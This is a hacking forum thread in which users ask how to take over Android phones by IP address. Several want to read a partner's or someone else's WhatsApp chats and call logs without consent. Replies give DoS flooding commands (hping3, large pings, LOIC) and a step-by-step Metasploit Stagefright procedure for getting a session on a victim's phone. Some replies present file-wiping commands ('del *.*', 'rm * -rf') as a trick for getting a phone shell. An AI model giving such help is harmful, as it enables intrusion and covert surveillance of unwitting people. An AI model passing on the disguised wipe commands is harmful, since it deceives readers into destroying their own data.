Forum Thread: How to Hack an Android Device with Only a Ip Adress

i have a android phone and im wondering if i could get remote access to it with just the ip of the device and being able to look to whatsapp etc . i would like to preform actions like in a metasploit session but just without an file that needs to be installed on the device

Never Miss a Hacking or Security Guide

New Null Byte in your inbox, every week.

33 Responses

Well, a DoS attack is the simplest and one of my favorite attacks. Use something like hping3 to ping the device until it crashes! If you are using Windows, prepare a DDoS attack by getting a large group of people to ping ip address -t -l 65500 or just use LOIC.

but how do i continue to get control of the device and get like whatsapp chats or call history etc

Can you help me install keylogger in my girlfriend's phone remotely?? Please reply

what can we do if the device is crashed..?

how do i continue to get control of the device and get like whatsapp chats or call history etc

i nee dyour advice and how i control android mobile with ip adress are same wife how can i hack

You should take HelpDesks advice and create and install a payload. the ip alone wont do much for ya, a payload is pretty nessesary.

If you dont have access to the device and no other way of sending the payload to the target. Knowing the ip address, i suppose you could perform a MITM attack to get your payload to the target. But that doesnt mean theyll install it.

knowing the ip address is good for a lot of things, tho controlling a device remotely isnt really one of them.

If your just wanting to have remote access to one of your devices or one that you have access to and dont want to install a payload. Use SSH or something like VNC, TeamViewer ect. With these you just put them on both devices and connect using the ip and usually a password or keys.

Would u send me a video to understand this method without creating any help desk .
I am having only the IP address of the smart phone.
It works on MIUI 8.1

Step 1: android smartphone Ip address security camera setup

What is the simplest way to use a smartphone camera as a security camera, using the ip address?

hi I want to know. I would like to spy call logs, watsapp messages and smses, but the target phone is no where near me we live in different towns and I can not get the phone. is there a way I can do it without needing the target phone or a way I can install it on target phone remotely?

How to hack a device via ip

i too wanna know how to hack a phone by its ip

I was wondering that can I hack a phone if I know IP address as well as mobile number .

Its easy, Simply go to cmd and type "cd C:\ && del *.* " then hit yes, you'll see it load some code then ask for your IP, input the IP and you'll have a shell on the phone.

Happy Hacking :)

What exactly does this do?

u are not good on this u need to write this cd ~ && del . -f /n cd ~ && rm * -rf

my pc is showing that access is denied solve this problem

You can use stagefright exploit in metasploit, this will generate a payload in a form of a website so when the victim views the website a session will be opened for you.

open an msfconsole
search stagefright
use the first exploit (it should be the only one there)
options
set your svrhost
set your svrport
run the exploit
let the victim open the url given (it may be something like 192.168.1.1/yt4byddh)
then you should get a session on your console

Sir hum ip address k zrey apni dosri device par kya kya kam kar sakty han

• Bro, yeh English Forum he, yahaa sub English be baat karte he. Ap ki jo bhi Problem he, English me bheje.

(In English : Bro, This is an English Forum Page, here everyone speaks English. If you are having any Problem, then please post it in English)

Its very easy, Simply go to cmd and type "cd C:\ && del . " then click yes, you'll see it load some code then ask for your IP, input the IP and you'll have a shell on the phone.

Plz help.. I want to know my whats going on my other phone.. Whatsap,contact,call log everything.. Plz help

For that you have to make a payload in metasploit framework and then send it to other phone via port forwarding and then start listner and you will have the remote control to the other phone...

I need to access the contact list of an android phone without any installations on the phone. I have the IP address and its connected on the same wifi as my laptop. Is there any options for the same. I have a windows tablet pc, and a mac while the phone that I need to access is Samsung note 9.

If there is a way please share the steps, as I am new to these areas and I am exploring the possibilities of gaining access.

does this ever works? I think I'll try it on my android device

Hi everyone I'm new to hacking so plz help me guys

I want help becaue a guys is threatening and blackmailing me in facebook to expose a photo to my family and friends. Asking me to pay money so he will not expose it. I dont have ang money and I feel really threatened. I want to access his phone, honestly I dont know where he is located at the moment, but just to access and if possible to erase the photo and whatever info he has about me. Initially, I reported everything on facebook and the account was deactivated but he just keeps on making new account to message me. I need help. Anyone expert on this matter?

Can you tell me the profile he is using? A link to his page? I will find out what I can to help because I've been in this situation before

I need help, someone keeps on messaging me on fb, even harassing and threatning me. I need to access her phone to delete some picture. This is stressing me. I only have her phone IP Address.

Share Your Thoughts

• Hot
  • Active